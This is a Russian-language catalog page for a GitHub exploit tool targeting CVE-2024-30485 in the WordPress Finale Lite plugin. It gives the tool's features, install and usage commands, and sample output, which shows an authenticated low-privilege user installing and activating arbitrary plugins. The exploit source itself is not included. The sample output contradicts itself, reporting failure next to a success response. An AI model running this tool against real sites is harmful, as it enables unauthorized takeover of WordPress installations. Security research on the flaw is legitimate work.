Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/nxploited/cve-2024-30485
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2024-30485

CVE-2024-30485

Плагин WordPress Finale Lite <= 2.18.0 - Уязвимость произвольной установки/активации плагинов для Подписчик+

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-30485 Эксплойт

📌 Обзор

CVE-2024-30485 — это уязвимость высокой степени серьезности, обнаруженная в плагине Finale Lite для WordPress (версии <= 2.18.0). Уязвимость позволяет аутентифицированным пользователям (Subscriber+) устанавливать и активировать произвольные плагины без соответствующей авторизации.

  • Серьезность: ВЫСОКАЯ (CVSS 8.8)
  • Затронутые версии: Finale Lite <= 2.18.0
  • CWE: CWE-862 (Отсутствие авторизации)

🚀 Возможности

  • ✅ Проверить, уязвим ли сайт WordPress
  • ✅ Аутентифицироваться с действительными учетными данными
  • ✅ Извлечь nonce безопасности
  • ✅ Установить произвольные плагины
  • ✅ Активировать установленные плагины

🛠 Требования

  • Python 3
  • Модули requests и beautifulsoup4
  • Целевой сайт WordPress с уязвимым плагином
  • Действительные учетные данные WordPress (Subscriber+)

📜 Установка

# Клонируйте репозиторий
git clone https://github.com/Nxploited/CVE-2024-30485.git
cd CVE-2024-30485

# Установите зависимости
pip install -r requirements.txt

🔍 Использование

usage: CVE-2024-30485.py [-h] -u TARGET -U USERNAME -P PASSWORD [plugin]

Эксплойт CVE-2024-30485 - Finale Lite | # от Khaled AlEnazi

positional arguments:
  plugin                Слаг плагина

options:
  -h, --help            показать это сообщение и выйти
  -u TARGET, --url TARGET  URL сайта WordPress
  -U USERNAME, --username USERNAME  Имя пользователя WordPress
  -P PASSWORD, --password PASSWORD  Пароль WordPress

Пример:

python3 CVE-2024-30485.py -u target -U admin -P admin -- disable-comments

🖥 Пример вывода

[+] Target is vulnerable! Detected version: 2.18.0
[+] Logged in successfully.
[+] Extracted Nonce: 2b46e05bc0
[-] Failed to install plugin.
Server Response: 
<p>Unpacking the package&#8230;</p>
<p>Installing the plugin&#8230;</p>
<p>Plugin installed successfully.</p>
</div>{"success":true,"data":"Plugin installed and activated successfully!"}

⚠️ Отказ от ответственности

Этот скрипт предназначен только для образовательных целей и исследований в области безопасности. Несанкционированное тестирование систем без разрешения незаконно. Используйте ответственно.

🔗 Ссылки

  • Официальная запись CVE
  • Страница плагина WordPress

Автор: Khaled Alenazi (Nxploit)

Скачать инструмент